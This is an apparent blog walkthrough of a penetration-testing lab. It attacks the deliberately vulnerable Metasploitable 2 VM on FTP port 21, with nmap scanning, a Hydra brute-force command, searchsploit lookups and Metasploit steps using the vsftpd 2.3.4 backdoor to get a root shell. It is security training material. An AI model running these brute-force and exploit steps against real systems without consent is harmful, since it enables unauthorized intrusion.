avatarCybertech Maven

Summary

This article provides a detailed guide on penetration testing by exploiting the FTP Port 21 on Metasploitable 2, a vulnerable virtual machine used for security training.

Abstract

The article "Penetration Testing Series: Hacking Metasploitable 2 By Exploiting FTP Port 21" delves into the educational process of compromising a system through its FTP service. It outlines the steps required to set up a lab environment using VirtualBox, Kali Linux, and Metasploitable 2, and then proceeds to demonstrate reconnaissance techniques, such as using ifconfig, netdiscover, and nmap, to identify the target system and open ports. The guide includes creating username and password lists for brute-force attacks, using tools like Hydra and Searchsploit to find and exploit vulnerabilities, and employing the Metasploit Framework to gain unauthorized access to the system. The author emphasizes the importance of understanding these tactics for educational purposes to enhance offensive security skills and develop robust defense mechanisms against potential cyber threats.

Opinions

  • The author stresses the educational intent of the article, aiming to empower security professionals and enthusiasts with knowledge on how to identify and secure systems against potential threats.
  • There is a clear disclaimer stating that all information provided is for educational purposes only, and the author cannot be held responsible for any misuse or damage caused by applying the techniques described.
  • The article promotes ethical hacking practices and underscores the necessity to obey all applicable local, state, and federal laws when using the tools and techniques discussed.
  • By providing a step-by-step approach to exploiting FTP Port 21, the author conveys the importance of hands-on practice in a controlled environment to understand and mitigate cybersecurity risks effectively.
  • The use of Metasploit Framework and other penetration testing tools is encouraged for enhancing offensive security skills, with the ultimate goal of improving defensive security measures.
  • The author invites readers to engage with the content by following them for more articles, leaving feedback, and even becoming contributors to "The Gray Area" for those interested in cybersecurity and computer science topics.

Penetration Testing Series: Hacking Metasploitable 2 By Exploiting FTP Port 21

Introduction

In this article, we delve into the intriguing realm of penetration testing by exploring the process of exploiting FTP Port 21 on the renowned vulnerable virtual machine, Metasploitable 2.

Metasploitable 2 is intentionally designed to be susceptible to various attacks and is a resource for security professionals to enhance their offensive security skills. By targeting Metasploitable 2’s vulnerable FTP service, we aim to provide an in-depth understanding of the techniques employed by ethical hackers and penetration testers to exploit and gain unauthorized access to systems.

FTP (File Transfer Protocol) is a widely used network protocol that facilitates the transfer of files between a client and a server over a computer network. While it remains an essential tool for data exchange, it also presents a potential avenue for attackers to breach a system. In this article, we focus on exploiting FTP Port 21; the default port FTP servers use for control and command operations.

Throughout this exploration, we will utilize the Metasploit Framework to illustrate how to take advantage of the vulnerabilities in the FTP service on Metasploitable 2 by employing commonly available modules and payloads. With this approach, we can access the target system without authorization.

It is important to emphasize that this article’s intent is solely educational and aimed at empowering security professionals and enthusiasts with knowledge on how to identify and secure their systems against potential threats. Understanding the tactics used by malicious actors is critical in developing robust defense mechanisms and implementing effective security measures.

Disclaimer:

All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.

Lab Setup

  • VirtualBox
  • Kali Linux Virtual Machine (VM)
  • Metasploitable 2 VM

Exploiting Metasploitable 2’s FTP Service: Gaining Unauthorized Access through Port 21

Part 1: Reconnaissance

To begin, we need to gather information about the target system. Follow these steps:

  1. Use the ifconfig command to get the IP address of the Metasploitable 2 VM: 10.60.0.18.
ifconfig

2. In the Kali Linux VM, execute the “netdiscover” command to perform reconnaissance and find live hosts on the local network.

netdiscover -r 10.60.0.0/24

The netdiscover tool sends Address Resolution Protocol (ARP) requests to the network, allowing it to identify devices and their corresponding IP addresses. By listening to ARP replies, netdiscover can build a list of active hosts on the network and provide information such as IP addresses, MAC addresses, and device manufacturer details.

3. Note the IP address of the Metasploitable 2 VM (10.60.0.18) and its MAC address. Press “Ctrl + C” to exit netdiscover.

4. Use the “nmap” command to execute a network scan with specific options and save the output to “META2.txt.”

nmap -p- sV -oN META2.txt 10.60.0.18

The Nmap scan results show that FTP Port 21 is open on the target system.

Part 2: Create Username and Password List.

In this section, we will create our own username and password list. Follow these steps:

  1. Use the “nano” command to create a username file called “Users.txt.”
nano Users.txt

2. Input the desired usernames in the “Users.txt” file.

3. View the “Users.txt” file using the “cat” command.

cat Users.txt

4. Copy the usernames for later use.

5. Use the “nano” command to create a password file called “Passwords.txt.”

nano Passwords.txt

6. Paste all the usernames into the “Passwords.txt” file.

7. Use the “cat” command to view the passwords in the “Passwords.txt” file.

cat Passwords.txt

Part 3: Exploit Open FTP Port 21

Now that we have gathered the necessary information, we can exploit the FTP service on the target system. Follow these steps:

  1. We already know from the Nmap scan that FTP Port 21 is open, and the version of the FTP server is “vsftpd 2.3.4,” an older version with known vulnerabilities.
  2. Use the “hydra” command to execute the Hydra tool and perform a brute-force attack on the FTP service of the target system (IP address: 10.60.0.18) using the created username and password list.
hydra -L Users.txt -P Passwords.txt 10.60.0.18 ftp

Hydra will iterate through the wordlists and attempt to find valid credentials. If successful, we can use these credentials to gain FTP access to the server.

3. Type the following command to initiate an FTP client session and connect to the FTP server on the IP address 10.60.0.18.

ftp 10.60.0.18

You can use any valid username and password combination from the successful Hydra results. We used “msfadmin” as the username and password in this case.

4. Congratulations! You have successfully gained unauthorized access to the Metasploitable 2 machine via FTP Port 21.

Name: msfadmin
Password: msfadmin

Part 4: Searchsploit

Another way to exploit FTP Port 21 is using a tool called “Searchsploit.” Follow these steps:

  1. Type “byeto exit the FTP session.

2. Copy the FTP version information, “vsftpd 2.3.4.”

3. Use the “searchsploit” command to search for known exploits related to the specific version of the vsftpd FTP server software (2.3.4) in the Exploit Database (EDB).

searchsploit vsftpd 2.3.4

The searchsploit tool will display any known vulnerabilities associated with this version of FTP, including exploits such as backdoor command execution and others compatible with Metasploit.

Part 5: Metasploit

Metasploit is a robust framework for penetration testing and exploitation. Follow these steps to utilize Metasploit to gain access to the target system:

  1. Type “msfconsole” to launch the Metasploit Framework command-line interface.
msfconsole

2. Use the “search” command followed by the FTP version to search for information within the Metasploit Framework related to the vsftpd 2.3.4 FTP server version.

search vsftpd 2.3.4

We received back one exploit, which matches the backdoor exploit found with Searchsploit.

3. Type “use 0” to select and use the backdoor exploit.

use 0

4. Type “show options” to view the required parameters that need to be set for the exploit.

show options
\

5. Fill in the required parameters, such as setting the RHOSTS (Remote Hosts) to the IP address of the target system (10.60.0.18).

6. Again, Type “show options” to confirm that you have set the RHOSTS correctly.

set RHOSTS 10.60.0.18
show options

7. Finally, type “exploit” to execute the exploitation and gain access to the Metasploitable 2 machine via FTP Port 21.

exploit 

Exploit was successful, and we now have a shell on the target system and can perform various actions.

If we type “whoami,” the response will be “root.”

When the command “ifconfig” is entered, the resulting output will display the IP address of the Metasploitable 2 virtual machine, indicated as 10.60.0.18.

8. To exit Metasploit, type the following commands:

Ctrl C
y
exit

Conclusion

I appreciate you taking the time to read this article. Hopefully, the information presented has been helpful and valuable to you.

I aim to reach a wider audience and enlighten them about the potential risks of cyber-attacks, various types of penetration testing tools, and everything related to information technology.

If you would like to access more articles, please follow me.

Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!

The Gray Area is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out this form! To get updates whenever The Gray Area publishes an article, check out our Twitter page, @TGAonMedium.

Cybersecurity
Penetration Testing
Ethical Hacking
Metasploit
Ftp
Recommended from ReadMedium